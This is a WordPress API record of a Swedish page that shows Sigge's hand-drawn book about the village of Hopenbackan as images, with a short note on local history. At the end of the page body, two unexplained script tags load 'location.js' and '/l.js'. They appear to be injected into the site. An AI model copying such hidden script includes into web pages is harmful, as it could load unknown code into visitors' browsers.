{"id":4025,"date":"2019-08-31T06:40:24","date_gmt":"2019-08-31T04:40:24","guid":{"rendered":"http:\/\/hindersby.net\/nywp\/?page_id=4025"},"modified":"2019-08-31T06:40:24","modified_gmt":"2019-08-31T04:40:24","slug":"sigges-bok","status":"publish","type":"page","link":"https:\/\/hindersby.net\/word2021\/sigges-bok\/","title":{"rendered":"Sigges Bok"},"content":{"rendered":"<p>Sigge skrev eller egentligen ritade ju en bok om Hopenbackan som \u00e4r ett verkligt konstverk. D\u00e4rf\u00f6r s\u00e4tter jag in den som bilder.<\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/titel.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4027\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/titel.jpg\" alt=\"\" width=\"2208\" height=\"1692\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/grundandet.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4028\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/grundandet.jpg\" alt=\"\" width=\"1764\" height=\"1680\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/fornminnesforening.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4031\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/fornminnesforening.jpg\" alt=\"\" width=\"2272\" height=\"1704\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/tack.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4032\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/tack.jpg\" alt=\"\" width=\"2272\" height=\"1704\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/Sigges.karta_.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4026\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/Sigges.karta_.jpg\" alt=\"\" width=\"2007\" height=\"1383\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/trebro.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4030\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/trebro.jpg\" alt=\"\" width=\"2082\" height=\"1698\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/trebrotext.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4029\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/trebrotext.jpg\" alt=\"\" width=\"1872\" height=\"1698\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/flotand.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4035\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/flotand.jpg\" alt=\"\" width=\"1758\" height=\"1692\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/tjomparna.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4036\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/tjomparna.jpg\" alt=\"\" width=\"1821\" height=\"1677\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/majstang.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4038\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/majstang.jpg\" alt=\"\" width=\"1839\" height=\"1662\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hopenbackan.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4039\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hopenbackan.jpg\" alt=\"\" width=\"1611\" height=\"1635\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hopenbacktext.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4040\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hopenbacktext.jpg\" alt=\"\" width=\"1695\" height=\"1665\"><\/a><\/p>\n<p>I b\u00f6rjan p\u00e5 1500-talet var byn redan fullt utbyggd s\u00e5 den var troligen flera hundra \u00e5r \u00e4ldre. \u00c5r 755 vet man att handelsm\u00e4n byggde Aldeigjuborg&nbsp; (Staraja Ladoga) s\u00e5 d\u00e5 var handelsrutten l\u00e4ngs Finska vikens norra kust redan etablerad.<\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/steinbro.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4041\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/steinbro.jpg\" alt=\"\" width=\"1905\" height=\"1665\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/gungan.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4042\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/gungan.jpg\" alt=\"\" width=\"1557\" height=\"1587\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hystanlindon.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4044\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hystanlindon.jpg\" alt=\"\" width=\"1821\" height=\"1644\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/julkalas.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4046\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/julkalas.jpg\" alt=\"\" width=\"1788\" height=\"1617\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/kalasmat.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4047\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/kalasmat.jpg\" alt=\"\" width=\"1845\" height=\"1650\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/storsjifte.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4048\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/storsjifte.jpg\" alt=\"\" width=\"1764\" height=\"1644\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/stein-gusta.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4049\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/stein-gusta.jpg\" alt=\"\" width=\"1806\" height=\"1674\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/leanders.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4050\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/leanders.jpg\" alt=\"\" width=\"1764\" height=\"1653\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hedd-mor.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4051\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hedd-mor.jpg\" alt=\"\" width=\"1752\" height=\"1692\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/kontbisagatan.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4052\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/kontbisagatan.jpg\" alt=\"\" width=\"1815\" height=\"1641\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/oppstu.nissas.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4053\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/oppstu.nissas.jpg\" alt=\"\" width=\"1683\" height=\"1647\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/nystu-mobro.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4054\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/nystu-mobro.jpg\" alt=\"\" width=\"1815\" height=\"1683\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/erikssons.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4055\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/erikssons.jpg\" alt=\"\" width=\"1896\" height=\"1668\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/lisa.eriksson.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4056\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/lisa.eriksson.jpg\" alt=\"\" width=\"1854\" height=\"1686\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/erikssons.familj.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4057\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/erikssons.familj.jpg\" alt=\"\" width=\"1854\" height=\"1626\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hosmas.kvarn_.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4058\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hosmas.kvarn_.jpg\" alt=\"\" width=\"1662\" height=\"1557\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/bosnisskvarn.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4059\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/bosnisskvarn.jpg\" alt=\"\" width=\"1695\" height=\"1545\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/oppstumoofassmiddjan.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4060\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/oppstumoofassmiddjan.jpg\" alt=\"\" width=\"1815\" height=\"1593\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/romartjerrsbackan.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4061\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/romartjerrsbackan.jpg\" alt=\"\" width=\"1752\" height=\"1635\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/tattarstein.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4062\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/tattarstein.jpg\" alt=\"\" width=\"1764\" height=\"1596\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/saandgatun.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4063\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/saandgatun.jpg\" alt=\"\" width=\"1770\" height=\"1644\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/blaasbackan.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4064\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/blaasbackan.jpg\" alt=\"\" width=\"1746\" height=\"1596\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hurtigslekt.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4065\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hurtigslekt.jpg\" alt=\"\" width=\"1761\" height=\"1692\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/kirkusdjeerdon.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4066\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/kirkusdjeerdon.jpg\" alt=\"\" width=\"1689\" height=\"1641\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/Hosmasgaardn.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4067\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/Hosmasgaardn.jpg\" alt=\"\" width=\"1671\" height=\"1677\"><\/a><\/p>\n<p>I slutet p\u00e5 boken finns urklipp och fotografier<\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hurtigs.tidning.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4069\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/hurtigs.tidning.jpg\" alt=\"\" width=\"1209\" height=\"1560\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/rosenqvist.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4070\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/rosenqvist.jpg\" alt=\"\" width=\"1365\" height=\"1464\"><\/a><\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/broreck.tidning.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4071\" src=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2019\/08\/broreck.tidning.jpg\" alt=\"\" width=\"1203\" height=\"1257\"><\/a><\/p>\n<p>&nbsp;<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sigge skrev eller egentligen ritade ju en bok om Hopenbackan som \u00e4r ett verkligt konstverk. D\u00e4rf\u00f6r s\u00e4tter jag in den som bilder. I b\u00f6rjan p\u00e5 1500-talet var byn redan fullt utbyggd s\u00e5 den var troligen flera hundra \u00e5r \u00e4ldre. \u00c5r 755 vet man att handelsm\u00e4n byggde Aldeigjuborg&nbsp; (Staraja Ladoga) s\u00e5 d\u00e5 var handelsrutten l\u00e4ngs Finska &hellip; <a href=\"https:\/\/hindersby.net\/word2021\/sigges-bok\/\" class=\"more-link\">Forts\u00e4tt l\u00e4sa<span class=\"screen-reader-text\"> \u201dSigges Bok\u201d<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-4025","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/4025","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/comments?post=4025"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/4025\/revisions"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/media?parent=4025"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}